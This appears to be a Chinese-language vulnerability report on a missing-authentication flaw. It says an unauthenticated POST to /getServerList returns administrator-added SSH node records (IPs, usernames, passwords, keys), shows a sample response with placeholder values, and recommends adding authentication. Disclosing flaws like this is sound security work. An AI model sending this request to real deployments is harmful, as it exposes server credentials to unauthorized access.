- 本文主题: SSH列表数据接口缺乏身份验证机制导致未经授权访问,任意客户端可发起POST请求
-
问题描述: 发现了一个缺乏身份验证的漏洞,该接口允许未经身份验证的用户进行获取管理员添加的节点SSH相关数据,从而导致未经授权的访问和潜在的安全问题。复现步骤:
- 使用任意 HTTP 客户端向接口发送 POST 请求,
- URL事件:/getServerList?pageIndex=1&pageSize=10
- 返回json:
- {
"count": 3,
"list": [
{
"ID": 0,
"CreatedAt": "2024-02-10T07:55:15.051+08:00",
"UpdatedAt": "2024-02-10T07:57:36.343+08:00",
"DeletedAt": null,
"id": 1,
"name": "1",
"ip": "1.1.1.1",
"sshPort": "",
"sshUser": "",
"sshPassword": "",
"key": "11",
"status": 1
},
{
"ID": 0,
"CreatedAt": "2024-02-10T07:57:44.894+08:00",
"UpdatedAt": "2024-02-10T07:57:44.894+08:00",
"DeletedAt": null,
"id": 2,
"name": "1",
"ip": "3.3.3.3",
"sshPort": "",
"sshUser": "",
"sshPassword": "",
"key": "1",
"status": 1
},
{
"ID": 0,
"CreatedAt": "2024-02-10T07:58:40.803+08:00",
"UpdatedAt": "2024-02-10T07:58:40.803+08:00",
"DeletedAt": null,
"id": 3,
"name": "112",
"ip": "2.2.2.2",
"sshPort": "",
"sshUser": "",
"sshPassword": "",
"key": "111",
"status": 1
}
],
"msg": "获取成功",
"rel": true
}
经测试,无鉴权校验,即可获取节点SSH数据,例如SSH的ip和ssh密码。
影响范围:此漏洞可能影响节点机器被恶意利用,以及系统可能面临的安全风险。解决方案: -
强烈建议在接口中实施适当的身份验证机制,例如Oauth,以防止未经授权的访问!
